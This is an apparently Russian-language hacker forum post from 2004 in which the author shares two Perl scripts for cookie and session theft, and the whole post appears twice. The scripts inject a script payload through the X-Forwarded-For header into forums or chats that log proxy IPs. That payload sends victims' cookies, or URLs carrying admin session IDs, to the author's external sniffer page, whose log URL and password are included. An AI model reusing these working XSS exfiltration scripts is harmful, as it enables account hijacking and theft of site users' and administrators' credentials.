Fr1k
14.08.2004, 14:46
Кароче вот написал себе снифер...
Главная работа заключается в том если форум,гостевая,чат получает айпи через прокси (X_FORVARED_FOR) при отсылке нашего сообщения или ника, получаем КУКИ журтвы или Его сэссию
1-версия получаем куки
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛН КА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМ МУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+document.cookie+'\")';document.all.tags ('font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮ ОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
2 верси, получаем сэссии админов
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛН КА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМ МУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+location.href+'\")';document.all.tags(' font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮ ОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
Как заметно в первой версии получаем через document.cookie
во второй через location.href
http://seechat.fatal.ru/frik/good.php? - этот скрипт обрабатывает отсылку первого скрипта... если так и войти на неё то в броузере ничего не покажется а ваш ИП попадёт в него!!!
Просматреть его можно по ссылке
http://seechat.fatal.ru/frik/good.php?pass=123321
Главная работа заключается в том если форум,гостевая,чат получает айпи через прокси (X_FORVARED_FOR) при отсылке нашего сообщения или ника, получаем КУКИ журтвы или Его сэссию
1-версия получаем куки
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛН КА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМ МУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+document.cookie+'\")';document.all.tags ('font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮ ОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
2 верси, получаем сэссии админов
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛН КА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМ МУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+location.href+'\")';document.all.tags(' font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮ ОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
Как заметно в первой версии получаем через document.cookie
во второй через location.href
http://seechat.fatal.ru/frik/good.php? - этот скрипт обрабатывает отсылку первого скрипта... если так и войти на неё то в броузере ничего не покажется а ваш ИП попадёт в него!!!
Просматреть его можно по ссылке
http://seechat.fatal.ru/frik/good.php?pass=123321